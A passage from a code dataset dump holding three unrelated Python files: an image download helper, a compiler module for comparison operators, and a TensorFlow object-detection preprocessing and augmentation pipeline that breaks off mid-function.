os._exit(0)\n","repo_name":"codepritesh/saastoolfeb","sub_path":"bots/balance_adjuster_bot.py","file_name":"balance_adjuster_bot.py","file_ext":"py","file_size_in_byte":21843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21075289395","text":"# -*- coding: utf-8 -*-\n# -*- mode: python -*-\nimport os\n\ndef get_img(net, url):\n img = net.req(url)\n return img\n\ndef save_img(fobj, fpath, tmppath='temp'):\n ipath = os.path.join(tmppath, fpath)\n ipath = ipath.rstrip('/')\n if not os.path.isfile(ipath):\n dpath = os.path.dirname(ipath)\n if not os.path.isdir(dpath):\n os.makedirs(dpath)\n with open(ipath, 'wb') as f:\n f.write(fobj)\n return ipath\n\ndef download_img(net, url, tmppath='temp'):\n img = get_img(net, url)\n return save_img(img, url.partition('://')[2], tmppath)\n","repo_name":"waipu/bakawipe","sub_path":"lib/ocr/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31598071555","text":"from smartanthill_zc import node, expression\nfrom smartanthill_zc.lookup import RootScope\nfrom smartanthill_zc.node import ParameterListNode, Node, ResolutionHelper\n\n\nclass OperatorDeclNode(Node, ResolutionHelper):\n\n '''\n Node class to represent an operator declaration\n '''\n\n def __init__(self, operator, type_name):\n '''\n Constructor\n '''\n super(OperatorDeclNode, self).__init__()\n self.child_parameter_list = None\n self.txt_operator = operator\n self.txt_type_name = type_name\n\n def set_parameter_list(self, child):\n '''\n parameter_list setter\n '''\n assert isinstance(child, ParameterListNode)\n child.set_parent(self)\n self.child_parameter_list = child\n\n def do_resolve_declaration(self, compiler):\n '''\n Template method from ResolutionHelper\n '''\n compiler.resolve_node(self.child_parameter_list)\n\n scope = self.get_scope(RootScope)\n scope.add_operator(compiler, self.txt_operator, self)\n\n return scope.lookup_type(self.txt_type_name)\n\n def static_evaluate(self, compiler, expr, arg_list):\n '''\n Do static evaluation of expressions when possible\n '''\n # pylint: disable=no-self-use\n # pylint: disable=unused-argument\n return None\n\n_negate_comparison_map = {'==': '!=',\n '!=': '==',\n '<': '>=',\n '>': '<=',\n '<=': '>',\n '>=': '<'}\n\n\ndef negate_comparison(txt_op, negate):\n '''\n If negate is False, returns the same txt_op,\n If negate is True, return the negated comparison operator\n '''\n\n if negate:\n return _negate_comparison_map[txt_op]\n else:\n return txt_op\n\n\n_negate_logic_map = {'!': '!',\n '&&': '||',\n '||': '&&'}\n\n\ndef negate_logic(txt_op, negate):\n '''\n If negate is False, returns the same txt_op,\n If negate is True, return the negated logic operator\n '''\n\n if negate:\n return _negate_logic_map[txt_op]\n else:\n return txt_op\n\n\n_swap_comparison_map = {'==': '==',\n '!=': '!=',\n '<': '>',\n '>': '<',\n '<=': '>=',\n '>=': '<='}\n\n\ndef swap_comparison(txt_op, swap):\n '''\n If swap is False, returns the same txt_op,\n If swap is True, return the comparison operator needed to swap lhs y rhs\n '''\n\n if swap:\n return _swap_comparison_map[txt_op]\n else:\n return txt_op\n\n\ndef simplify_comparison(txt_op, value, value_type):\n\n if txt_op in ['==', '!=']: # TODO really want to support == and != ?\n return (txt_op, value)\n elif txt_op == '<':\n return ('<', value_type.round_up(value))\n elif txt_op == '>':\n return ('>', value_type.round_down(value))\n elif txt_op == '<=':\n return ('<', value_type.next_up(value))\n elif txt_op == '>=':\n return ('>', value_type.next_down(value))\n else:\n assert False\n\n\ndef create_number_to_literal_comparison(compiler, ctx, root, operator_list):\n\n for current in operator_list:\n op = compiler.init_node(\n NumberToLiteralCompDeclNode(current, '_zc_boolean'), ctx)\n op.set_parameter_list(\n node.create_parameter_list(compiler, ctx,\n ['_zc_number', '_zc_number_literal']))\n root.add_declaration(op)\n\n op2 = compiler.init_node(\n NumberToLiteralCompDeclNode(current, '_zc_boolean'), ctx)\n op2.set_parameter_list(\n node.create_parameter_list(compiler, ctx,\n ['_zc_number_literal', '_zc_number']))\n op2.swap_flag = True\n root.add_declaration(op2)\n\n\nclass NumberToLiteralCompDeclNode(OperatorDeclNode):\n\n '''\n Node class to represent an special operator declaration\n for comparison between number and number literal\n This comparison is special because it is translated into specific\n ZEPTOVM_OP_JMPIFEXPR_XX operations\n '''\n\n def __init__(self, operator, type_name):\n '''\n Constructor\n '''\n super(NumberToLiteralCompDeclNode, self).__init__(\n operator, type_name)\n self.swap_flag = False\n\n def static_evaluate(self, compiler, expr, arg_list):\n '''\n Do replace generic ComparisonOpExprNode by a much more specific\n NumberToLiteralCompExprNode\n '''\n\n assert isinstance(expr, expression.ComparisonOpExprNode)\n assert len(expr.child_argument_list.childs_arguments) == 2\n\n result = compiler.init_node(NumberToLiteralCompExprNode(), expr.ctx)\n result.set_argument_list(expr.child_argument_list)\n result.ref_decl = self\n\n compiler.remove_node(expr)\n\n result.set_type(self.get_type())\n\n return result\n\n\nclass NumberToLiteralCompExprNode(node.ExpressionNode):\n\n '''\n Node class representing an special operator comparison expression\n between a number and a number literal.\n This kind of expression is created from a regular ComparisonOpExprNode\n by NumberToLiteralCompDeclNode for all expressions that match\n This allows easier detection of this special comparison at a later time\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n super(NumberToLiteralCompExprNode, self).__init__()\n self.child_argument_list = None\n self.ref_decl = None\n\n def set_argument_list(self, child):\n '''\n argument_list setter\n '''\n assert isinstance(child, node.ArgumentListNode)\n child.set_parent(self)\n self.child_argument_list = child\n\n def get_expression(self):\n assert len(self.child_argument_list.childs_arguments) == 2\n\n i = 0 if not self.ref_decl.swap_flag else 1\n return self.child_argument_list.childs_arguments[i]\n\n def get_literal(self):\n assert len(self.child_argument_list.childs_arguments) == 2\n\n i = 1 if not self.ref_decl.swap_flag else 0\n return self.child_argument_list.childs_arguments[i]\n\n def get_subcode_and_threshold(self, negate):\n '''\n simplify >= and <= to < and > by modifying literal value by epsilon\n Also apply an optional negation flag, as helper for code generator,\n since normally if body is executed when condition is true,\n but at implementation, body is jumped when condition is false\n '''\n\n op = swap_comparison(\n self.ref_decl.txt_operator, self.ref_decl.swap_flag)\n\n op = negate_comparison(op, negate)\n\n threshold = self.get_literal().get_static_value()\n assert threshold\n ltype = self.get_expression().get_type()\n\n return simplify_comparison(op, threshold, ltype)\n\n\ndef create_number_to_number_comparison(compiler, ctx, root, operator_list):\n\n for current in operator_list:\n op = compiler.init_node(\n NumberToNumberCompDeclNode(current, '_zc_boolean'), ctx)\n op.set_parameter_list(node.create_parameter_list(compiler, ctx,\n ['_zc_number',\n '_zc_number']))\n root.add_declaration(op)\n\n\nclass NumberToNumberCompDeclNode(OperatorDeclNode):\n\n '''\n Node class to represent an special operator declaration\n for comparison between number and number literal\n This comparison is special because it is translated into specific\n ZEPTOVM_OP_JMPIFEXPR_XX operations\n '''\n\n def __init__(self, operator, type_name):\n '''\n Constructor\n '''\n super(NumberToNumberCompDeclNode, self).__init__(\n operator, type_name)\n\n def static_evaluate(self, compiler, expr, arg_list):\n '''\n Do replace generic ComparisonOpExprNode by a much more specific\n NumberToLiteralCompExprNode\n '''\n\n assert isinstance(expr, expression.ComparisonOpExprNode)\n assert len(expr.child_argument_list.childs_arguments) == 2\n\n result = compiler.init_node(NumberToNumberCompExprNode(), expr.ctx)\n result.set_argument_list(expr.child_argument_list)\n result.ref_decl = self\n\n compiler.remove_node(expr)\n\n result.set_type(self.get_type())\n\n return result\n\n\nclass NumberToNumberCompExprNode(node.ExpressionNode):\n\n '''\n Node class representing an special operator comparison expression\n between a number and a number literal.\n This kind of expression is created from a regular ComparisonOpExprNode\n by NumberToLiteralCompDeclNode for all expressions that match\n This allows easier detection of this special comparison at a later time\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n super(NumberToNumberCompExprNode, self).__init__()\n self.child_argument_list = None\n self.ref_decl = None\n\n def set_argument_list(self, child):\n '''\n argument_list setter\n '''\n assert isinstance(child, node.ArgumentListNode)\n child.set_parent(self)\n self.child_argument_list = child\n\n def get_subcode_and_threshold(self, negate):\n '''\n simplify >= and <= to < and > by modifying literal value by epsilon\n Also apply an optional negation flag, as helper for code generator,\n since normally if body is executed when condition is true,\n but at implementation, body is jumped when condition is false\n '''\n op = negate_comparison(self.ref_decl.txt_operator, negate)\n\n ltype = self.child_argument_list.childs_arguments[0].get_type()\n\n return simplify_comparison(op, 0.0, ltype)\n","repo_name":"smartanthill/zepto-compiler","sub_path":"smartanthill_zc/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":9828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"39598675121","text":"import config\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.keras as keras\nimport tensorflow_datasets as tfds\nfrom utils.util_graph import shrink_and_normalize_boxes, create_reg_positive_sample\n\n_image_size = [512, 640, 768, 896, 1024, 1280, 1408]\n_STRIDES = [8, 16, 32, 64, 128]\n_ALPHA = 0.0\n\n\n@tf.function\ndef _normalization_image(image, mode):\n if mode == 'ResNetV1':\n # Caffe\n image = image[..., ::-1] # RGB -> BGR\n image -= [103.939, 116.779, 123.68]\n\n elif mode == 'ResNetV2':\n image /= 127.5\n image -= 1.\n\n elif mode == 'EffNet':\n image = image\n\n elif mode in ['DenseNet', 'SEResNet']:\n # Torch\n image /= 255.\n image -= [0.485, 0.456, 0.406]\n image /= [0.229, 0.224, 0.225]\n\n return image\n\n\ndef _fmap_shapes(phi: int = 0, level: int = 5):\n _img_size = int(phi * 128) + 512\n _strides = [int(2 ** (x + 3)) for x in range(level)]\n\n shapes = []\n\n for i in range(level):\n fmap_shape = _img_size // _strides[i]\n shapes.append([fmap_shape, fmap_shape])\n\n return shapes\n\n\n@tf.function\ndef random_flip_horizontal(image, image_shape, bboxes, prob=0.5):\n \"\"\"Flips image and boxes horizontally\n\n Arguments:\n image: A 3-D tensor of shape `(height, width, channels)` representing an\n image.\n image_shape:\n bboxes: A tensor with shape `(num_boxes, 4)` representing bounding boxes,\n having normalized coordinates.\n prob: Chance.\n\n Returns:\n Randomly flipped image and boxes\n \"\"\"\n\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.flip_left_right(image)\n bboxes = tf.stack(\n [\n image_shape[1] - bboxes[..., 2] - 1,\n bboxes[..., 1],\n image_shape[1] - bboxes[..., 0] - 1,\n bboxes[..., 3]\n ],\n axis=-1\n )\n return image, bboxes\n\n\n@tf.function\ndef random_rotate(image, image_shape, bboxes, prob=0.5):\n offset = image_shape / 2.\n rotate_k = tf.random.uniform((), minval=1, maxval=4, dtype=tf.int32)\n\n def _r_method(x, y, angle):\n tf_cos = tf.math.cos(angle)\n tf_sin = tf.math.sin(angle)\n\n tf_abs_cos = tf.abs(tf_cos)\n tf_abs_sin = tf.abs(tf_sin)\n\n offset_h, offset_w = offset[0], offset[1]\n\n new_offset_w = offset_w * (tf_abs_cos - tf_cos) + offset_h * (tf_abs_sin - tf_sin)\n new_offset_h = offset_w * (tf_abs_sin + tf_sin) + offset_h * (tf_abs_cos - tf_cos)\n\n x_r = x * tf_cos + y * tf_sin + new_offset_w\n y_r = x * tf_sin * -1 + y * tf_cos + new_offset_h\n\n x_r = tf.round(x_r)\n y_r = tf.round(y_r)\n return x_r, y_r\n\n def _rotate_bbox(bbox):\n # degree: pi/2, pi, 3*pi/2\n angle = tf.cast(rotate_k, dtype=tf.float32) * (np.pi / 2.)\n\n x1, y1, x2, y2 = bbox[0], bbox[1], bbox[2], bbox[3]\n\n x1_n, y1_n = _r_method(x1, y1, angle)\n x2_n, y2_n = _r_method(x2, y2, angle)\n\n bbox = tf.stack([\n tf.minimum(x1_n, x2_n),\n tf.minimum(y1_n, y2_n),\n tf.maximum(x1_n, x2_n),\n tf.maximum(y1_n, y2_n)\n ])\n return bbox\n\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.rot90(image, k=rotate_k)\n\n bboxes = tf.map_fn(\n _rotate_bbox,\n elems=bboxes,\n fn_output_signature=tf.float32\n )\n image_shape = tf.cast(tf.shape(image)[:2], tf.float32)\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[:, 0], 0., image_shape[1] - 2), # x1\n tf.clip_by_value(bboxes[:, 1], 0., image_shape[0] - 2), # y1\n tf.clip_by_value(bboxes[:, 2], 1., image_shape[1] - 1), # x2\n tf.clip_by_value(bboxes[:, 3], 1., image_shape[0] - 1), # y2\n bboxes[:, -1]\n ],\n axis=-1\n )\n return image, image_shape, bboxes\n\n\n@tf.function\ndef multi_scale(image, image_shape, bboxes, prob=0.5):\n new_image_shape = image_shape\n\n if tf.random.uniform(()) > (1 - prob):\n # start, end, step = 0.25, 1.3, 0.05\n # scale = np.random.choice(np.arange(start, end, step))\n scale = tf.random.uniform((), minval=0.8, maxval=1.3)\n\n new_image_shape = tf.round(image_shape * scale)\n image = tf.image.resize(\n image,\n tf.cast(new_image_shape, tf.int32),\n method=tf.image.ResizeMethod.BILINEAR\n )\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[..., 0] * scale, 0, new_image_shape[1] - 2),\n tf.clip_by_value(bboxes[..., 1] * scale, 0, new_image_shape[0] - 2),\n tf.clip_by_value(bboxes[..., 2] * scale, 1, new_image_shape[1] - 1),\n tf.clip_by_value(bboxes[..., 3] * scale, 1, new_image_shape[0] - 1),\n ],\n axis=-1\n )\n bboxes = tf.round(bboxes)\n return image, new_image_shape, bboxes\n\n\n@tf.function\ndef random_crop(image, image_shape, bboxes, prob=0.5):\n if tf.random.uniform(()) > (1 - prob):\n min_x1y1 = tf.cast(tf.math.reduce_min(bboxes, axis=0)[:2], tf.int32)\n max_x2y2 = tf.cast(tf.math.reduce_max(bboxes, axis=0)[2:], tf.int32)\n new_image_shape = tf.cast(image_shape, tf.int32)\n\n random_x1 = tf.random.uniform((), minval=0, maxval=tf.maximum(min_x1y1[0] // 2, 1), dtype=tf.int32)\n random_y1 = tf.random.uniform((), minval=0, maxval=tf.maximum(min_x1y1[1] // 2, 1), dtype=tf.int32)\n\n random_x2 = tf.random.uniform(\n (),\n minval=max_x2y2[0] + 1,\n maxval=tf.math.maximum(\n tf.math.minimum(new_image_shape[1], max_x2y2[0] + (new_image_shape[1] - max_x2y2[0]) // 2),\n max_x2y2[0] + 2\n ),\n dtype=tf.int32\n )\n random_y2 = tf.random.uniform(\n (),\n minval=max_x2y2[1] + 1,\n maxval=tf.math.maximum(\n tf.math.minimum(new_image_shape[0], max_x2y2[1] + (new_image_shape[0] - max_x2y2[1]) // 2),\n max_x2y2[1] + 2\n ),\n dtype=tf.int32\n )\n\n image = tf.image.crop_to_bounding_box(\n image,\n offset_height=random_y1,\n offset_width=random_x1,\n target_height=(random_y2 - random_y1),\n target_width=(random_x2 - random_x1)\n )\n\n bboxes = tf.stack(\n [\n bboxes[:, 0] - tf.cast(random_x1, tf.float32),\n bboxes[:, 1] - tf.cast(random_y1, tf.float32),\n bboxes[:, 2] - tf.cast(random_x1, tf.float32),\n bboxes[:, 3] - tf.cast(random_y1, tf.float32),\n ],\n axis=-1\n )\n image_shape = tf.cast(tf.shape(image)[:2], tf.float32)\n\n return image, image_shape, bboxes\n\n\ndef random_image_saturation(image, prob=.5):\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.random_saturation(image, 1, 5)\n\n return image\n\n\ndef random_image_brightness(image, prob=.5):\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.random_brightness(image, 0.8, 1.)\n\n return image\n\n\ndef random_image_contrast(image, prob=.5):\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.random_contrast(image, 0.2, 1.)\n\n return image\n\n\n@tf.function\ndef image_color_augmentation(image):\n ids = int(tf.random.uniform((), minval=0, maxval=3))\n\n if ids == 0:\n image = random_image_saturation(image)\n\n elif ids == 1:\n image = random_image_brightness(image)\n\n elif ids == 2:\n image = random_image_contrast(image)\n\n return image\n\n\n@tf.function\ndef _image_transform(image, target_size=512, padding_value=.0):\n image_height, image_width = tf.shape(image)[0], tf.shape(image)[1]\n\n if image_height > image_width:\n scale = tf.cast((target_size / image_height), dtype=tf.float32)\n resized_height = target_size\n resized_width = tf.cast((tf.cast(image_width, dtype=tf.float32) * scale), dtype=tf.int32)\n else:\n scale = tf.cast((target_size / image_width), dtype=tf.float32)\n resized_height = tf.cast((tf.cast(image_height, dtype=tf.float32) * scale), dtype=tf.int32)\n resized_width = target_size\n\n image = tf.image.resize(\n image,\n (resized_height, resized_width),\n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n\n offset_h = (target_size - resized_height) // 2\n offset_w = (target_size - resized_width) // 2\n\n # (h, w, c)\n pad = tf.stack(\n [\n tf.stack([offset_h, target_size - resized_height - offset_h], axis=0),\n tf.stack([offset_w, target_size - resized_width - offset_w], axis=0),\n tf.constant([0, 0]),\n ],\n axis=0\n )\n\n image = tf.pad(image, pad, constant_values=padding_value)\n\n return image, scale, [offset_h, offset_w]\n\n\n@tf.function\ndef _bboxes_transform(bboxes, classes, scale, offset_hw, max_bboxes=20, padding=False):\n bboxes *= scale\n bboxes = tf.stack(\n [\n (bboxes[:, 0] + tf.cast(offset_hw[1], dtype=tf.float32)),\n (bboxes[:, 1] + tf.cast(offset_hw[0], dtype=tf.float32)),\n (bboxes[:, 2] + tf.cast(offset_hw[1], dtype=tf.float32)),\n (bboxes[:, 3] + tf.cast(offset_hw[0], dtype=tf.float32)),\n classes\n ],\n axis=-1,\n )\n\n if padding:\n # true_label_count\n bboxes_count = tf.shape(bboxes)[0]\n max_bbox_pad = tf.stack(\n [\n tf.stack([tf.constant(0), max_bboxes - bboxes_count], axis=0),\n tf.constant([0, 0]),\n ],\n axis=0\n )\n bboxes = tf.pad(bboxes, max_bbox_pad, constant_values=0.)\n\n else:\n bboxes_count = tf.shape(bboxes)[0]\n\n return bboxes, bboxes_count\n\n\n@tf.function\ndef _clip_transformed_bboxes(image, bboxes, debug=False):\n image_shape = tf.cast(tf.shape(image)[:2], dtype=tf.float32)\n\n if debug:\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[:, 0] / image_shape[1], 0., 1.), # x1\n tf.clip_by_value(bboxes[:, 1] / image_shape[0], 0., 1.), # y1\n tf.clip_by_value(bboxes[:, 2] / image_shape[1], 0., 1.), # x2\n tf.clip_by_value(bboxes[:, 3] / image_shape[0], 0., 1.), # y2\n bboxes[:, -1]\n ],\n axis=-1\n )\n\n else:\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[:, 0], 0., image_shape[1] - 2), # x1\n tf.clip_by_value(bboxes[:, 1], 0., image_shape[0] - 2), # y1\n tf.clip_by_value(bboxes[:, 2], 1., image_shape[1] - 1), # x2\n tf.clip_by_value(bboxes[:, 3], 1., image_shape[0] - 1), # y2\n bboxes[:, -1]\n ],\n axis=-1\n )\n return bboxes\n\n\n@tf.function\ndef compute_inputs(sample):\n image = tf.cast(sample[\"image\"], dtype=tf.float32)\n image_shape = tf.cast(tf.shape(image)[:2], dtype=tf.float32)\n bboxes = tf.cast(sample[\"objects\"][\"bbox\"], dtype=tf.float32)\n classes = tf.cast(sample[\"objects\"][\"label\"], dtype=tf.float32)\n\n bboxes = tf.stack(\n [\n bboxes[:, 0] * image_shape[1],\n bboxes[:, 1] * image_shape[0],\n bboxes[:, 2] * image_shape[1],\n bboxes[:, 3] * image_shape[0],\n ],\n axis=-1\n )\n return image, image_shape, bboxes, classes\n\n\ndef preprocess_data_v1(\n phi: int = 0,\n mode: str = \"ResNetV1\",\n fmap_shapes: any = None,\n max_bboxes: int = 100,\n padding_value: float = 128.,\n debug: bool = False,\n):\n \"\"\"Applies preprocessing step to a single sample\n\n ref: https://keras.io/examples/vision/retinanet/#preprocessing-data\n\n \"\"\"\n\n def _preprocess_data(sample):\n #\n image, image_shape, bboxes, classes = compute_inputs(sample)\n\n # Image Shape aug.\n if config.MISC_AUG:\n # image, image_shape, bboxes = multi_scale(image, image_shape, bboxes, prob=0.5)\n # image, image_shape, bboxes = random_rotate(image, image_shape, bboxes, prob=.01)\n image, bboxes = random_flip_horizontal(image, image_shape, bboxes, prob=0.5)\n # image, image_shape, bboxes = random_crop(image, image_shape, bboxes, prob=0.5)\n\n # Image Color aug.\n if config.VISUAL_AUG:\n image = image_color_augmentation(image)\n\n # Transforming image and bboxes into fixed-size.\n image, scale, offset_hw = _image_transform(image, _image_size[phi], padding_value)\n image = _normalization_image(image, mode) if not debug else image\n\n # Clipping bboxes\n bboxes, bboxes_count = _bboxes_transform(bboxes, classes, scale, offset_hw, max_bboxes, padding=False)\n bboxes = _clip_transformed_bboxes(image, bboxes, debug=debug)\n\n fmaps_shape = tf.constant(fmap_shapes, dtype=tf.int32)\n # return image, bboxes, bboxes_count[None], fmaps_shape\n return image, bboxes, scale, image_shape\n\n return _preprocess_data\n\n\ndef preprocess_data_v2(\n phi: int = 0,\n mode: str = \"ResNetV1\",\n fmap_shapes: any = None,\n padding_value: float = 128.,\n debug: bool = False,\n):\n \"\"\"Applies preprocessing step to a single sample\n\n ref: https://keras.io/examples/vision/retinanet/#preprocessing-data\n\n \"\"\"\n\n def _preprocess_data(sample):\n #\n image, image_shape, bboxes, classes = compute_inputs(sample)\n\n # Image Shape aug.\n if config.MISC_AUG:\n image, image_shape, bboxes = multi_scale(image, image_shape, bboxes, prob=0.5)\n image, image_shape, bboxes = random_rotate(image, image_shape, bboxes, prob=.5)\n image, bboxes = random_flip_horizontal(image, image_shape, bboxes, prob=0.5)\n image, image_shape, bboxes = random_crop(image, image_shape, bboxes, prob=0.5)\n\n # Image Color aug.\n if config.VISUAL_AUG:\n image = image_color_augmentation(image)\n\n # Transforming image and bboxes into fixed-size.\n image, scale, offset_hw = _image_transform(image, _image_size[phi], padding_value)\n image = _normalization_image(image, mode) if not debug else image\n\n # Clipping bboxes\n bboxes, bboxes_count = _bboxes_transform(bboxes, classes, scale, offset_hw, padding=False)\n bboxes = _clip_transformed_bboxes(image, bboxes, debug=debug)\n\n fmaps_shape = tf.constant(fmap_shapes, dtype=tf.int32)\n return image, bboxes[:, :4], bboxes[:, -1], fmaps_shape\n\n return _preprocess_data\n\n\n@tf.function\ndef _compute_targets_v1(image, bboxes, classes, fmap_shapes):\n num_cls = config.NUM_CLS\n\n cls_target_ = tf.zeros((0, num_cls + 2), dtype=tf.float32)\n reg_target_ = tf.zeros((0, 4 + 2), dtype=tf.float32)\n ind_target_ = tf.zeros((0, 1), dtype=tf.int32)\n\n classes = tf.cast(classes, tf.int32)\n\n for level in range(len(_STRIDES)):\n stride = _STRIDES[level]\n\n fh = fmap_shapes[level][0]\n fw = fmap_shapes[level][1]\n\n pos_x1, pos_y1, pos_x2, pos_y2 = shrink_and_normalize_boxes(bboxes, fh, fw, stride, config.SHRINK_RATIO)\n\n def build_map_function_target(args):\n pos_x1_ = args[0]\n pos_y1_ = args[1]\n pos_x2_ = args[2]\n pos_y2_ = args[3]\n box = args[4]\n cls = args[5]\n\n \"\"\" Create Negative sample \"\"\"\n neg_top_bot = tf.stack((pos_y1_, fh - pos_y2_), axis=0)\n neg_lef_rit = tf.stack((pos_x1_, fw - pos_x2_), axis=0)\n neg_pad = tf.stack([neg_top_bot, neg_lef_rit], axis=0)\n\n \"\"\" Regression Target: create positive sample \"\"\"\n _loc_target, _ap_weight, _area = create_reg_positive_sample(\n box, pos_x1_, pos_y1_, pos_x2_, pos_y2_, stride\n )\n\n \"\"\" Classification Target: create positive sample \"\"\"\n _cls_target = tf.zeros((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, num_cls), dtype=tf.float32) + (\n _ALPHA / config.NUM_CLS)\n _cls_onehot = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, 1), dtype=tf.float32) * (1 - _ALPHA)\n _cls_target = tf.concat((_cls_target[..., :cls], _cls_onehot, _cls_target[..., cls + 1:]), axis=-1)\n\n \"\"\" Padding Classification Target's negative sample \"\"\"\n _cls_target = tf.pad(\n _cls_target,\n tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0),\n )\n\n \"\"\" Padding Soft Anchor's negative sample \"\"\"\n _ap_weight = tf.pad(_ap_weight, neg_pad, constant_values=1)\n\n \"\"\" Creating Positive Sample locations and padding it's negative sample \"\"\"\n _pos_mask = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_))\n _pos_mask = tf.pad(_pos_mask, neg_pad)\n\n \"\"\" Padding Regression Target's negative sample \"\"\"\n _loc_target = tf.pad(_loc_target, tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0))\n\n \"\"\" Output Target \"\"\"\n # shape = (fh, fw, cls_num + 2)\n _cls_target = tf.concat([_cls_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # shape = (fh, fw, 4 + 2)\n _loc_target = tf.concat([_loc_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # (fh, fw)\n _area = tf.pad(_area, neg_pad, constant_values=1e7)\n\n return _cls_target, _loc_target, _area\n\n # cls_target : shape = (objects, fh, fw, cls_num + 2)\n # reg_target : shape = (objects, fh, fw, 4 + 2)\n # area : shape = (objects, fh, fw)\n level_cls_target, level_reg_target, level_area = tf.map_fn(\n build_map_function_target,\n elems=[pos_x1, pos_y1, pos_x2, pos_y2, bboxes, classes],\n fn_output_signature=(tf.float32, tf.float32, tf.float32),\n )\n # min area : shape = (objects, fh, fw) --> (fh, fw)\n level_min_area_indices = tf.argmin(level_area, axis=0, output_type=tf.int32)\n # (fh, fw) --> (fh * fw)\n level_min_area_indices = tf.reshape(level_min_area_indices, (-1,))\n\n # (fw, ), (fh, )\n locs_x, locs_y = tf.range(0, fw), tf.range(0, fh)\n\n # (fh, fw) --> (fh * fw)\n locs_xx, locs_yy = tf.meshgrid(locs_x, locs_y)\n locs_xx = tf.reshape(locs_xx, (-1,))\n locs_yy = tf.reshape(locs_yy, (-1,))\n\n # (fh * fw, 3)\n level_indices = tf.stack((level_min_area_indices, locs_yy, locs_xx), axis=-1)\n\n \"\"\" Select \"\"\"\n level_cls_target = tf.gather_nd(level_cls_target, level_indices)\n level_reg_target = tf.gather_nd(level_reg_target, level_indices)\n level_min_area_indices = tf.expand_dims(\n tf.where(tf.equal(level_cls_target[..., -1], 1.), level_min_area_indices, -1),\n axis=-1)\n\n cls_target_ = tf.concat([cls_target_, level_cls_target], axis=0)\n reg_target_ = tf.concat([reg_target_, level_reg_target], axis=0)\n ind_target_ = tf.concat([ind_target_, level_min_area_indices], axis=0)\n # ind_target_ = tf.concat([ind_target_, tf.expand_dims(level_min_area_indices, -1)], axis=0)\n\n # ind_target_ = tf.where(tf.equal(cls_target_[..., -1], 1.), ind_target_[..., 0], -1)[..., None]\n # Shape: (anchor-points, cls_num + 2), (anchor-points, 4 + 2)\n return image, cls_target_, reg_target_, ind_target_, tf.shape(bboxes)[0][..., None]\n\n\n@tf.function\ndef _compute_targets_v2(image, bboxes, classes, fmap_shapes):\n num_cls = config.NUM_CLS\n\n cls_target_ = tf.zeros((0, num_cls + 2), dtype=tf.float32)\n reg_target_ = tf.zeros((0, 4 + 2), dtype=tf.float32)\n ind_target_ = tf.zeros((0, 1), dtype=tf.int32)\n mk_target_ = tf.zeros((tf.shape(bboxes)[0], 0, 1), dtype=tf.float32)\n\n classes = tf.cast(classes, tf.int32)\n\n for level in range(len(_STRIDES)):\n stride = _STRIDES[level]\n\n fh = fmap_shapes[level][0]\n fw = fmap_shapes[level][1]\n\n pos_x1, pos_y1, pos_x2, pos_y2 = shrink_and_normalize_boxes(bboxes, fh, fw, stride, config.SHRINK_RATIO)\n\n def build_map_function_target(args):\n pos_x1_ = args[0]\n pos_y1_ = args[1]\n pos_x2_ = args[2]\n pos_y2_ = args[3]\n box = args[4]\n cls = args[5]\n\n \"\"\" Create Negative sample \"\"\"\n neg_top_bot = tf.stack((pos_y1_, fh - pos_y2_), axis=0)\n neg_lef_rit = tf.stack((pos_x1_, fw - pos_x2_), axis=0)\n neg_pad = tf.stack([neg_top_bot, neg_lef_rit], axis=0)\n\n \"\"\" Regression Target: create positive sample \"\"\"\n _loc_target, _ap_weight, _area = create_reg_positive_sample(\n box, pos_x1_, pos_y1_, pos_x2_, pos_y2_, stride\n )\n\n \"\"\" Classification Target: create positive sample \"\"\"\n _cls_target = tf.zeros((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, num_cls), dtype=tf.float32) + (\n _ALPHA / config.NUM_CLS)\n _cls_onehot = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_, 1), dtype=tf.float32) * (1 - _ALPHA)\n _cls_target = tf.concat((_cls_target[..., :cls], _cls_onehot, _cls_target[..., cls + 1:]), axis=-1)\n\n \"\"\" Padding Classification Target's negative sample \"\"\"\n _cls_target = tf.pad(\n _cls_target,\n tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0),\n )\n\n \"\"\" Padding Soft Anchor's negative sample \"\"\"\n _ap_weight = tf.pad(_ap_weight, neg_pad, constant_values=1)\n\n \"\"\" Creating Positive Sample locations and padding it's negative sample \"\"\"\n _pos_mask = tf.ones((pos_y2_ - pos_y1_, pos_x2_ - pos_x1_))\n _pos_mask = tf.pad(_pos_mask, neg_pad)\n\n \"\"\" Padding Regression Target's negative sample \"\"\"\n _loc_target = tf.pad(_loc_target, tf.concat((neg_pad, tf.constant([[0, 0]])), axis=0))\n\n \"\"\" Output Target \"\"\"\n # shape = (fh, fw, cls_num + 2)\n _cls_target = tf.concat([_cls_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # shape = (fh, fw, 4 + 2)\n _loc_target = tf.concat([_loc_target, _ap_weight[..., None], _pos_mask[..., None]], axis=-1)\n # (fh, fw)\n _area = tf.pad(_area, neg_pad, 